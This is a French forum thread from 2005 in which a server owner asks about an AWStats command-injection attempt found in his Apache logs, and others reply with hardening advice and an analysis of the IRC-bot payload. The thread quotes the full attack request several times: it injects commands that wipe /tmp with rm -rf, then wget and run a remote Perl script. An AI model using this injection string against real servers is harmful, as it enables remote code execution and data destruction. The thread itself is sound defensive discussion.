Des GET /stats/awstats.pl dans mes logs apache

Le
Bernard
Bonjour
J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293

Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).

Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ).

Merci de votre attention
Bernard
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Jean-Francois BILLAUD
Le #784144
scripsit Bernard :

Bonjour


Bonjour,

J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293

Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).

Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).


- lire les alertes de sécurité (s'abonner à la liste d'information mises à jour
ou sécurité de votre distribution) ;
- mettre le système à jour (noyau, logiciel de base) ;
- mettre à jour Apache PHP MySQL ;
- mettre à jour les scripts PHP (c'est probablement le point le plus faible) ;
- utiliser chkrootkit ou rkhunter ;
- lire les logs.

Merci de votre attention


Pas de quoi.


JFB

--
"Murphy's Law, that brash proletarian restatement of Godel's Theorem ..."
-- Thomas Pynchon, "Gravity's Rainbow"

Jacques Caron
Le #784145
Salut,

On 14 Jul 2005 23:37:26 GMT, Bernard <"bfermaut
atfreedotfr"@news53rd.b1.woo> wrote:

J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293

Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).


Plus précisément, c'est une attaque par code injection sur awstats, qui
est un module de stats pour Apache en perl, qui doit probablement aussi
très bien tourner sous Windows. Ceci dit, pour que l'attaque fonctionne
sous Windows il faudrait que des outils comme rm ou wget soient
disponibles, mais je ne serais pas étonné que certaines distributions de
perl pour Windows le fassent aussi.

Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).


Mettre à jour awstats...

Jacques.

Delf
Le #784141
Bernard wrote:

Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).


N'autoriser l'accès à awStats uniquement en local ?

--
Delf

Clement Lecigne
Le #784142
On Thu, 14 Jul 2005 23:37:26 +0000, Bernard wrote:

Bonjour
Bonjour,


(...)
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).


Pour moi ce n'est pas devenu une activité anormale, des requêtes de ce
genre j'en reçois au moins une tous les 2 jours. Elles proviennent de
worms, de scanneur, ou d'humain ;o).
Dans ce cas, il est question d'exploiter une faille contenue dans AWStats
=< 6.2 qui permet l'execution de commandes à distance
(/stats/awstats.pl?configdir=|cmd|) [1]. Ici le pirate fais le ménage dans
/tmp, télécharge un script perl (www.members.lycos.co.uk/ramona/s),
l'execute puis le supprime. Ce script perl écrit par un italien (cf
commentaires), pour ce que j'ai vu, se cache dans les processus sous
le nom `sh -i', il se connecte sur IRC au réseau undernet sous le nick de
ramonaXXXX sur le canal #goplanet, il peut être alors commandé à partir
d'IRC, on peut lui faire éxecuter divers commandes.
Curieux, je suis aller voir sur ce canal, il y avait une dizaine de
ramonaXXX et autant d'op^Wpirates qui passent leur journée à controler
leur ramona ;o).

Comme je suis en train de passer à LINUX, je me demande que faire
pour

se prémunir de ce genre de situation (paramétrage apache, firewall,
...).


Avoir un système à jour, se tenir au courant des nouvelles vulnérabilités
... Dans ce cas là, tu n'as aucune crainte à avoir puisque tu n'as pas
d'AWStats qui tournent (du moins pas dans /stats) et donc l'attaque a
échoué comme l'indique l'erreur 404.

Merci de votre attention
Bernard


De rien,
Clément.

[1] http://www.securityfocus.com/bid/12298

jack
Le #794847
Si qqun a recupere le script perl pour analyse ca m'interesse.
Publicité
Poster une réponse
Anonyme